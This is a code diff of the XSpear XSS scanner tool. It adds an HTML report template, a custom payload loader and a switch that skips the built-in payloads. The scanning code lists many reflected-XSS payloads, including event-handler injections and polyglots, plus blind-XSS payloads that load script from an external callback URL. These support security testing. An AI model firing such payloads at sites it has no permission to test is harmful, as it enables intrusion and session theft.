+          ::-webkit-scrollbar {
+              min-width: 12px;
+              width: 12px;
+              max-width: 12px;
+              min-height: 12px;
+              height: 12px;
+              max-height: 12px;
+              background-color: #252C33;
+          }
+          ::-webkit-scrollbar-thumb {
+              background: rgba(255,255,255,0.1);
+              border: solid 3px #252C33;
+              border-radius: 100px;
+          }
+          ::-webkit-scrollbar-thumb:hover {
+              background: rgba(255,255,255,0.2);
+          }
+          ::-webkit-scrollbar-thumb:active {
+              background: rgba(255,255,255,0.2);
+          }
+          ::-webkit-scrollbar-button {
+              display: none;
+              height: 0px;
+          }
+          /* CONTAINER */
+          #container {
+              display: table;
+              width: 100%;
+              background: #252C33;
+              margin: 0px auto;
+              border-radius: 0px;
+          }
+          /* Side Bar */
+          #sideMenu {
+              width: 240px;
+              height: 100%;
+              padding: 30px;
+              border-right: 1px solid rgba(0,0,0,.1);
+              background: #1b232a;
+              display: table-cell;
+              vertical-align: top;
+              color: #fff;
+          }
+          #sideMenuFixed{
+              position: fixed;
+              top: 0px;
+              left: 0px;
+              width: 240px;
+              height: 100%;
+              padding: 30px;
+              border-right: 1px solid rgba(0,0,0,.1);
+              background: #1b232a;
+              z-index: 9;
+          }
+          #sidecontent{
+              position: fixed;
+              width: 200px;
+              z-index: 10;
+          }
+          #sidecontent h1:first-child{
+              color: maroon;
+              text-shadow: 5px 5px 0px rgba(0,0,0,.2);
+              font-weight: 700;
+              font-size: 27px;
+              margin-left: -8px;
+          }
+          .menu {
+              list-style: none;
+              margin:  24px 0;
+              padding: 0;
+              width: 100%;
+          }
+          .menu li {
+              display: block;
+              height: 30px;
+              width: 100%;
+              line-height: 30px;
+              font-size: 14px;
+              font-weight: 300;
+              color: rgba(255, 255, 255, .7);
+              position: relative;
+              cursor: pointer;
+          }
+          .menu li:hover {
+              color: #FFF;
+          }
+          .menu li:first-child {
+              height: 35px;
+              line-height: 35px;
+              font-size: 16px;
+              font-weight: 700;
+              color: #DDD;
+              background: rgba(0,0,0,.08);
+              margin-left: -18px;
+              padding: 0px 10px;
+              border-radius: 8px;
+              cursor: default;
+          }
+          .addCategory {
+              font-size: 13px;
+              font-weight: 200;
+              color: rgba(255, 255, 255, .2);
+          }
+          .addCategory:hover {
+              color: #fff;
+          }
+          /* Content */
+          #content {
+              width: calc(100% - 240px);
+              height: 100%;
+              padding: 25px;
+              display: table-cell;
+          }
+          a{
+            color:rgba(255, 255, 255, .8);
+          }
+          /* Table */
+          table {
+              width: 100%;
+              border-collapse: collapse;
+          }
+          th {
+              text-align: left;
+              color: #fff;
+              font-weight: 400;
+              font-size: 13px;
+              text-transform: uppercase;
+              border-bottom: 1px solid rgba(255, 255, 255, 0.1);
+              padding: 0 10px;
+              padding-bottom: 14px;
+          }
+          tr:not(:first-child):hover {
+              background: rgba(255, 255, 255, 0.03);
+          }
+          td {
+              height: 40px;
+              line-height: 40px;
+              font-weight: 300;
+              color: white;
+              padding: 0 10px;
+              vertical-align: top;
+          }
+          /* Headers */
+          h1 {
+              font-size: 13px;
+              font-weight: 200;
+              letter-spacing: 1px;
+              text-transform: uppercase;
+              margin: 0;
+          }
+          h2 {
+              float: left;
+              letter-spacing: 1px;
+              margin: 0;
+              color: white;
+          }
+          h3 {
+              float: left;
+              color: #fff;
+              font-size: 32px;
+              font-weight: 300;
+              margin: 0;
+              margin-top: 8%;
+              margin-left: 20px;
+              margin-bottom: 6px;
+          }
+          .LOW {
+            background-color: darkgoldenrod;
+          }
+          .MEDIUM {
+            background-color: sienna;
+          }
+          .HIGH {
+            background-color: firebrick;
+          }
+          .VULN {
+            background-color: maroon;
+          }
+          .ISSUE{
+            border: 1px solid white;
+          }
+          code {
+              background: black;
+              border: 1px solid;
+              padding: 3px;
+              border-radius: 5px;
+              color: white;
+          }
+      </style>
+      <div id='container'>
+          <div id='sideMenu'>
+              <div id='sideMenuFixed'></div>
+              <div id='sidecontent'>
+                  <h1>XSPEAR</h1> v#{XSpear::VERSION}
+                  <ul class='menu'>
+                      <li><a href='#summary'>Report</a></li>
+                      <li><a href='#issues'>Issues</a></li>
+                      <li><a href='#available'>Available Objects</a></li>
+                      <li><a href='#raw_query'>Raw Query</a></li>
+                  </ul>
+                  <ul class='menu'>
+                      <li><a href='https://github.com/hahwul/XSpear'>About XSpear</a></li>
+                      <li><a href='https://github.com/hahwul/XSpear/issues/new'>Submit Bugs</a></li>
+                  </ul>
+              </div>
+          </div>
+          <div id='content'>
+              <h2 id=summary>Summary</h2><br><br>
+              #{t_info}
+              <br><br><h2 id=issues>Issues</h2><br>
+              <table>
+                  <tr>
+                      <td>No</td><td>Type</td><td>Issue</td><td>Method</td><td>Parameter</td><td>Payload</td><td>Description</td>
+                  </tr>
+                  #{t_issue}
+              </table>
+              <br><br><h2 id=available>Available Objects</h2><br><br>
+              #{t_available}
+              <br><br><h2 id=raw_query>Raw Query</h2><br><br>
+              #{t_rawquery}
+          </div>
+      </div>
+    """
+    return report
+  end
   def to_json
     buffer = []
     @issue.each do |i|
@@ -80,8 +431,6 @@ class XspearRepoter
     hash.to_json
   end
-  def to_html; end
   def to_cli
     rurl = ""
     if @url.length > 66

data/lib/XSpear/version.rb CHANGED Viewed

@@ -1,3 +1,3 @@
 module XSpear
-  VERSION = "1.3.3"
+  VERSION = "1.4.0"
 end

data/lib/XSpear.rb CHANGED Viewed

@@ -23,11 +23,21 @@ class XspearScan
     else
       @params = options['params'].split(",")
     end
+    if options['cp'].nil?
+      @custom_payload = nil
+    else
+      @custom_payload = File.open(options['cp'])
+    end
     if options['all'] == true
       @all = true
     else
       @all = false
     end
+    if options['nx'] == true
+      @nx = true
+    else
+      @nx = false
+    end
     @thread = options['thread']
     @output = options['output']
     @verbose = options['verbose']
@@ -485,12 +495,21 @@ class XspearScan
         end
       end.each(&:join)
     end
     if @all == true
       log('s',"used test-all-params mode(-a)")
-      log('s',"creating a test query all param")
+      if @blind_url.nil?
+        log('s',"creating a test query all param")
+      else
+        log('s',"creating a test query all param + blind XSS")
+      end
     else
       log('s',"used test-reflected-params mode(default)")
-      log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
+      if @blind_url.nil?
+        log('s',"creating a test query [for reflected #{@reflected_params.length} param ]")
+      else
+        log('s',"creating a test query [for reflected #{@reflected_params.length} param + blind XSS ]")
+      end
     end
     @param_check_switch = false
     ## [ XSS Scanning ]
@@ -520,52 +539,53 @@ class XspearScan
     end
-    # Check Common XSS Payloads
-    onfocus_tags = [
-        "input",
-        "select",
-        "textarea",
-        "keygen"
-    ]
-    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
-    r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
-    onfocus_tags.each do |t|
-      r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
-    end
-    # Check Selenium Common XSS Payloads
-    r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
-    # + in Javascript payloads
-    r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
-    # Check Selenium XSS Polyglot
-    r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
-    r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    if @nx != true
+      # Check Common XSS Payloads
+      onfocus_tags = [
+          "input",
+          "select",
+          "textarea",
+          "keygen"
+      ]
+      r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '<svg/onload=alert(45)>', '<svg/onload=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '<img/src onerror=alert(45)>', '<img/src onerror=alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"><scr<script>ipt>alert(45)</scr<script>ipt>', '<script>alert(45)</script>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"><iframe/src=JavaScriPt:alert(45)>', '"><iframe/src=JavaScriPt:alert(45)>', 'h', "reflected "+"XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert`45`">', '<details/open/ontoggle="alert`45`">', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><meter onmouseover=alert(45)>0</meter>', '<meter onmouseover=alert(45)>0</meter>', 'h', "reflected "+"HTML5 XSS Code".red, CallbackStringMatch)
+      r.push makeQueryPattern('x', '"\'><svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>', '<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://portswigger.net?&semi;javascript:alert(1)&semi;0" />', 'h', "reflected "+"SVG Animate XSS".red, CallbackStringMatch)
+      onfocus_tags.each do |t|
+        r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
+      end
+      # Check Selenium Common XSS Payloads
+      r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
+      # + in Javascript payloads
+      r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
+      # Check Selenium XSS Polyglot
+      r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', 'javascript:"/*`/*\"/*\' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert(45)//-->&lt;<sVg/onload=alert`45`>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+      r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
+    end
     # Check Blind XSS Payload
     if !@blind_url.nil?
       r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
@@ -574,6 +594,20 @@ class XspearScan
       r.push makeQueryPattern('f', "\"'><iframe src=javascript:$.getScript('#{@blind_url}')></iframe>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
     end
+    if !@custom_payload.nil?
+      log('s','load custom payload')
+      cps = JSON.parse @custom_payload.read
+      cps.each do |cp|
+        if cp['callback'] == 'P1'
+          r.push makeQueryPattern('x', cp['payload'], cp['payload'], 'h', "reflected "+"Custom Payload #{cp['descript']} ".red, CallbackStringMatch)
+        elsif cp['callback'] == 'P2'
+          r.push makeQueryPattern('x', cp['payload'], 'alert(45)', 'v', "triggered ".yellow+"Custom Payload #{cp['descript']}".red, CallbackXSSSelenium)
+        else
+        end
+      end
+      log('s',"loaded and creating #{cps.length} custom payloads")
+    end
     r = r.flatten
     r = r.flatten
@@ -582,7 +616,8 @@ class XspearScan
     if @verbose.to_i == 1
       @progress_bar = ProgressBar.new(r.length)
     end
-    threads = []
     r.each_slice(@thread) do |jobs|
       jobs.map do |node|
         Thread.new do
@@ -606,12 +641,15 @@ class XspearScan
       end.each(&:join)
     end
     @report.set_filtered @filtered_objects
     @report.set_endtime
     log('s', "finish scan. the report is being generated..")
     if @output == 'json'
       puts @report.to_json
+    elsif @output == 'html'
+      f = File.open 'report.html', 'w+'
+      f.write @report.to_html
+      log('s', "generate html report file. please open ./report.html file")
     else
       @report.to_cli
     end

metadata CHANGED Viewed

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: XSpear
 version: !ruby/object:Gem::Version
-  version: 1.3.3
+  version: 1.4.0
 platform: ruby
 authors:
 - hahwul
 autorequire:
 bindir: exe
 cert_chain: []
-date: 2020-02-07 00:00:00.000000000 Z
+date: 2020-02-12 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: colorize
@@ -186,11 +186,12 @@ files:
 - LICENSE.txt
 - README.md
 - Rakefile
-- XSpear-1.3.2.gem
+- XSpear-1.3.3.gem
 - XSpear.gemspec
 - bin/console
 - bin/setup
 - config.json
+- custom_payload.json
 - exe/XSpear
 - forBurp/README.md
 - forBurp/otwa.sh

data/XSpear-1.3.2.gem DELETED Viewed

Binary file